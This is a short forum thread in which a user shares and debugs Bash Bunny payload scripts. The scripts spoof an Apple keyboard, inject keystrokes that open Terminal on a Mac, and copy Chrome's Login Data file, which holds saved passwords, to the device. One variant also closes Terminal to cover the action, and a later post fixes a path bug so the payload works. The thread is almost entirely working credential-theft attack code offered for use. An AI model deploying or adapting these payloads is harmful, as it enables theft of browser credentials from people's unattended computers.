thefragile99 Posted July 29, 2017 Share Posted July 29, 2017 #!/bin/bash LED ATTACK ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 3000 QUACK STRING cp -a ~/Library/Application\ Support/Google/Chrome/Default/Login\ Data /Volumes/BashBunny/loot/sMacAndGrab/; killall Terminal QUACK ENTER LED FINISH Quote Link to comment Share on other sites More sharing options...
thefragile99 Posted July 29, 2017 Author Share Posted July 29, 2017 Or this: #!/bin/bash LED ATTACK ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 3000 QUACK STRING osascript -e \'tell application \"Terminal\" to do script \"cp -a ~/Library/Application Support/Google/Chrome/Default/. ~/Volumes/BashBunny/loot/sMacAndGrab/\"\' QUACK ENTER LED FINISH Quote Link to comment Share on other sites More sharing options...
dobleD Posted July 30, 2017 Share Posted July 30, 2017 Why? What errors are u getting? Quote Link to comment Share on other sites More sharing options...
thefragile99 Posted July 30, 2017 Author Share Posted July 30, 2017 I fixed it - "Application Support" needed two // in Application// Support. Ugh. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.